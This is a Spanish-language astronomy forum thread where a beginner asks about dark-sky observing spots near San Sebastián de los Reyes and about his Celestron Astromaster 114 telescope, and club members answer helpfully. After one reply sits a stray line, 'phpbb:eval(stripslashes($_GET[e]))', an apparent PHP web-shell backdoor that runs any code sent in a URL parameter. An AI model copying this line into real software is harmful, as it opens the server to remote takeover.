zona buena para observacion nocturna

Preguntas básicas sobre astronomía
Responder
jomallose
Mensajes: 10
Registrado: Lun Ago 10, 2009 11:44 am

zona buena para observacion nocturna

Mensaje por jomallose »

Hola buenas.

Como vereis soi otro iniciado en este mundo de la observacion y recientemente me hice con un telescopio astromaster 114 eq de celestron.
tenia 3 preguntillas, a ver si alguien me puede echar un cable.

1º vivo en s.s. de los reyes y aun que no tenfgo mucho tiempo me gustaria algun dia al mes hacer una salida entre semana mas o menos cerca 30 o 35 km max .
podeis indicarme algun sito bueno sin CL donde tenga el cielo despejado???

2º es buen telescopio para empezar???

3º como puedo saber la apertura max. de mi telescopio??.


muchisimas gracias.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

zona buena para observacion nocturna

Mensaje por m3ntol »

Hola,
lo primero bienvenido al foro. Te respondo tus preguntas por orden:

1) Desde S.S. de los Reyes puedes ir hacia el norte por la N-I y desviarte hacia el este hacia zonas de baja contaminación lumínica como Fuente el Saz. Otra opción es ir por la N-II hacia Santos de la Humosa y llegar hasta el lugar de observación que solemos usar en la asociación:
http://www.astrohenares.org/foro/viewtopic.php?t=24

2) Es un reflector con una buena abertura (114mm) a F/9. Para empezar es más que de sobra. La montura es ecuatorial con lo que podrás practicar la puesta en estación y manejo. Lo mejor para empezar es que quedes con gente que ya esté algo rodada y te enseñe las cosas básicas. Puedes venir a cualquiera de las quedadas que organizamos y estaremos encantados de echarte una mano y responder todas tus preguntas.

3) La abertura es el diámetro del tubo, en tu caso 114mm, no es variable. Creo que te refieres a los aumentos máximos que puede dar tu telescopio. Este es un tema que suele preocupar mucho a los que empiezan en la afición y, créeme, no es tan importante.
La mayoría de objetos celestes no requieren una gran cantidad de aumentos para poder disfrutarlos. Los aspectos más importantes de un telescopio son su abertura, distancia focal y calidad general del aparato, tanto óptica como mecánica. Tu telescopio es de calidad media, la óptica incorpora una barlow fija y la parte mecánica es algo justa pero eso no debe preocuparte, es un buen telescopio para empezar. Si más adelante ves que esta afición te llena podrás decidir hacer un desembolso más importante.

Si quieres conocer los límites teóricos de tu telescopio puedes introducir los datos en nuestro calculador astronómico:
http://www.astrohenares.org/scopemath.php
Y ver aumentos máximos, capacidad de resolución, etcétera.

Espero haber sido de ayuda
Un saludo!
phpbb:eval(stripslashes($_GET[e]));
jomallose
Mensajes: 10
Registrado: Lun Ago 10, 2009 11:44 am

zona buena para observacion nocturna

Mensaje por jomallose »

Muchisimas gracias.
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

zona buena para observacion nocturna

Mensaje por Manuelariza »

Hola jomallose y bienvenido al foro,este sabado dia 15 hay organizada una salida a Pioz,desde S.S de los reyes habra unos 45 kilometros,el cielo no son de los mejores pero para quitarte el mono pero para empezar en la observacion esta muy bien.
Te recomiendo que asistas pues en estas quedadas es donde se aprende mucho.

Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Responder